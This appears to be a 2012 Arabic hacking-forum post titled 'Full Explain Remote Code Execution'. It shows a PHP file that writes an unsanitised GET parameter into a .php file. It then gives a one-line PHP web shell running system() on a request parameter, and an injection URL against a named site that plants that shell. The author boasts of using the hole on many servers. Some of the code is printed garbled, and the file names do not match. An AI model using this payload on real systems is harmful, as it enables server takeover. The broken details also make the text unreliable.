عرض مشاركة واحدة
قديم 10-12-2012, 04:28 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي Full Explain Remote Code Execution


السلام عليكم ورحمه الله وبركاته

السلام والصلاه على سيدنا محمد

سنشرح اليوم ثغره فريدة من نوعهآ ومعروفها وافادتني في سيرفرات كثيرة .

ان شاء الله يكون الشرح سهل جدا ..

الملف المصاب

كود PHP:
<?php
$school 
$_GET['love'];
$ip getenv('REMOTE_ADDR');
$error fopen('vbspiders.php','a');
fwrite($error,'<br />'.$school.'<br />'.$ip.'<br />');
fclose($error);
?>
الثغره تسمح لك بزرع كود خبيث ,

طلبنا الملف عبر المتغير Get

من ثم كونا الملف عبر ملف vbspiders بدالة fopen

ومن ثم قمنا بل تطبيق عبر الدالة fwrite ..

وفي الاخير غلقنا الخطاء بدالة fclose

الملف المصاب هو med.php

كود:
http://forum.advance-hackers.org/xx/med.php?love=


تمام بعد الرابط نزرع الملف ..

عن طريق ,,

كود PHP:
<?php
$cmd
=$_GET['mohamed'];
system($cmd);
?>
تمام نجرب نزرع الملف ..

كود PHP:
http://forum.advance-hackers.org/xx/med.php?love=%3C?php$cmd=$_GET['mohamed'];system($cmd);?%3E 
حلو تم زرع الملف ^_^

كود PHP:
http://forum.advance-hackers.org/xx/mohammed.php 
آتمنة ان افدتكم اخوكم حمد



Full Explain Remote Code Execution

   

رد مع اقتباس